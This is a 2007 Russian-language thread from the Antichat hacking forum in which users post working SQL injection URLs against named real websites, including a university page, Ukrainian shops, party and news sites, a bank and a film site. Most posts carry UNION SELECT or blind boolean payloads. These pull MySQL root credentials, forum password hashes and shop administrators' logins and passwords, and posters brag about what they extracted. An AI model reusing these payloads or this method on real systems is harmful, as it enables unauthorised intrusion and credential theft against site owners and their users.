18.07.2007, 22:06
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
www.nihoncar.com
Mysql Версия 5.
root:
Код:
http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9+from+mysql.user+limit+0,1/*
есть форум, пользователи:
Код:
http://www.nihoncar.com/en/news_details.php?id=-1+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9+from+phpbb_users+limit+1,1/*
лимит в помощь..
|
|
|
18.07.2007, 22:08
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами:
10566621
Репутация:
1198
|
|
http://www.it-news.cc/index.php?type=article&ID=-1+union+select+MenuID+from+Article/*
ы
|
|
|
|
18.07.2007, 22:20
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
www.wfsj.org
Примечательно серв на Windows/IIS
Код:
http://www.wfsj.org/resources/page.php?id=-1+union+select+1,2,3,convert(concat(user(),0x3a,version()),binary),5,6,7,8,9,0,11/*
|
|
|
|
19.07.2007, 01:32
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
PR=6
inside.tufts.edu
Код:
http://inside.tufts.edu/announce/index.php?t=id&id=-471+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user()),0x3a),0x3a),4,5,6,7,8/*
есть табица users но не могу подобрать колонки
|
|
|
|
19.07.2007, 16:20
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
С нами:
10084646
Репутация:
161
|
|
http://www.rzhavsky.com/politics.php?chr_id=-1+union+select+user(),database(),version(),4/*
какой-то Украинский политик...
http://www.reznik007.com/?p=-1'
MSSQL
http://www.snarodom.org.ua/index.php?level=1&type=topmenu§ion=-5+union+select+1,user()/*
какая-то газетка 
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
интернет магазин
http://www.bookshop.ua/Asp/annot.asp?bid=654738'
книжный магазин но тут MSSQL а я в ней не шарю 
|
|
|
|
19.07.2007, 21:33
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
какая-то газетка
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Хех вот я немного раз... это самое... ладно вот:
Код:
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSION()),0x31),0x31),5,6,7,8,9,10,11/*
Ну вот версия 5.0.19-standard ну дальше смотрим имена таблиц и столбцов:
Код:
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,TABLE_NAME,COLUMN_NAME),0x31),0x31),5,6,7,8,9,10,11 FROM INFORMATION_SCHEMA.COLUMNS/*
Ну вот собсно говоря таблица users:
Код:
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10,11%20FROM%20users/*
Ну и наскока я понял это админы
Код:
http://www.uashops.com/top.php?type=&topic=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x2D,id,login,pass),0x31),0x31),5,6,7,8,9,10,11%20FROM users WHERE admin=1/*
Только где админка хрен его...
__________________
Кто я?..
|
|
|
|
19.07.2007, 21:34
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
интернет магазин
Цитата:
http://www.bookshop.ua/Asp/annot.asp?bid=654738'
книжный магазин но тут MSSQL а я в ней не шарю
здесь insert, сделать по-моему ничего нельзя
|
|
|
|
20.07.2007, 08:41
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами:
10051477
Репутация:
136
|
|
Сайт:www.agric bank.com
http://www.agricbank.com/story.asp?ID=1+or+1=@@version--
|
|
|
|
20.07.2007, 12:44
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами:
9920546
Репутация:
1796
|
|
http://www.spu.in.ua/ua/search/?search_word=1'
Социалистическая партия Украины (ток чёт я ту не разобрался)
Там два запроса... Прийдется подбирать по символу:
Код:
http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING(VERSION(),1,1))>'50',1,(SELECT 1 UNION SELECT 2))/*
Кстати это 5 версия там 33 таблицы...
Для супер маньяков можно и поподбирать символы в названиях столбцов:
Код:
http://www.spu.in.ua/ua/search/?search_word=1') UNION SELECT 1 FROM pub WHERE id=IF(ASCII(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),1,1))>100,1,(SELECT 1 UNION SELECT 2))/*
__________________
Кто я?..
|
|
|
|
20.07.2007, 13:34
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
С нами:
10214321
Репутация:
552
|
|
Код:
http://ruskino.ru/news/?id=-393+union+select+VERSION(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?415599){kind=avatar}
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?415611){kind=avatar}
Комбинированный вид
